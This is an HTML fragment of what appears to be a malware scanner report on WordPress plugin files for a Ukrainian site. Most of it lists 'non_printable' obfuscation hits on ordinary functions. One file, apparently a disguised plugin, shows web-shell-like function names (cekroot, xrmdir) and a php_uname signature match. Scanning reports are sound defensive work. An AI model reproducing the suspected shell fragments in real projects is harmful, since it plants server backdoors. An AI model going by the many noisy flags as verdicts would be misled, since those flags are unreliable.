</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">render_settings_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code</span><span style="color: #007700">.</span><span style="color: #DD0000">', $this->plugin_name);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_apache</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'apache_get_modules'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_message</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">'updated'</span><span style="color: #007700">, </span><span style="color: #0000BB">$id </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_messages</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div id="message" class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'type'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'"><p>' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'</p></div>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_styles</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_settings_link</span><span style="color: #007700">(</span><span style="color: #0000BB">$links</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_dir</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uploads_dir</span><span style="color: #007700">[</span><span style="color: #DD0000">'basedir'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_url</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uploads_dir</span><span style="color: #007700">[</span><span style="color: #DD0000">'baseurl'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_subdirectories</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$subs</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_form</span><span style="color: #007700">(</span><span style="color: #0000BB">$form</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_htaccess_identifier</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"[plugin_name=" </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name </span><span style="color: #007700">. </span><span style="color: #DD0000">"]"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 94</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_index</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_241").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/eiaxb/admin/views/protect-uploads-admin-settings-page.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.62 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_242" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code </span><span style="color: #007700">(</span><span style="color: #0000BB">Forbidden Access</span><span style="color: #007700">).</span><span style="color: #DD0000">', $this->plugin_name); ?></p> </label><br /> } ?> <!-- --> if ( $this->check_protective_file_removable() && $this->check_uploads_is_protected() ) { ?> <label for="protection_3"> <input type="radio" value="remove" nam</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code </span><span style="color: #007700">(</span><span style="color: #0000BB">Forbidden Access</span><span style="color: #007700">).</span><span style="color: #DD0000">', $this->plugin_name); ?></p></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_242").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/eiaxb/uninstall.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.27 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_243" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$plugin_name </span><span style="color: #007700">= </span><span style="color: #DD0000">'protect-uploads'</span><span style="color: #007700">; if( </span><span style="color: #0000BB">is_admin</span><span style="color: #007700">()) </span><span style="color: #0000BB">delete_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_name </span><span style="color: #007700">. </span><span style="color: #DD0000">'-protection' </span><span style="color: #007700">); } } </span><span style="color: #0000BB">Alti_ProtectUploads_Uninstall</span><span style="color: #007700">::</span><span style="color: #0000BB">run</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_243").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/eiaxb/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.19 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_244" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span> </div> </body> </html></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 376</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">author</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekdir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 400</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='writable'>writable</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='readonly'>readonly</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekroot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xrmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">green</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">red</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 742</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statusnya</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_244").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/analytics-1769473357/eps-301-redirects.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 32.05 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:22:59</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:22:59</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 65</span><br><table id="file_245" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_redirects_pro_conflict</span><span style="color: #007700">() { </span><span style="color: #0000BB">$deactivate </span><span style="color: #007700">= </span><span style="color: #DD0000">'plugins.php?action=deactivate&plugin=eps-301-redirects/eps-301-redirects.php&plugin_status=all&paged=1'</span><span style="color: #007700">; </span><span style="color: #0000BB">$deactivate </span><span style="color: #007700">= </span><span style="color: #0000BB">wp_nonce_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$deactivate</span><span style="color: #007700">, </span><span style="color: #DD0000">'deactivate-plugin_eps-301-redirects/eps-301-redirects.php'</span><span style="color: #007700">); print</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1007</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_redirects_pro_conflict</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dismiss_pointer_ajax</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_widget</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_kses_wf</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">$styles</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$styles</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 431</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">widget_content</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will redirect the user </span><span style="color: #007700">if </span><span style="color: #0000BB">it can resolve that this url request has a redirect</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_redirect</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">; </span><span style="color: #FF8000">// No redirects.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 528</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_footer_text</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 540</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_plugin_page</span><span style="color: #007700">() {</span>
</span>
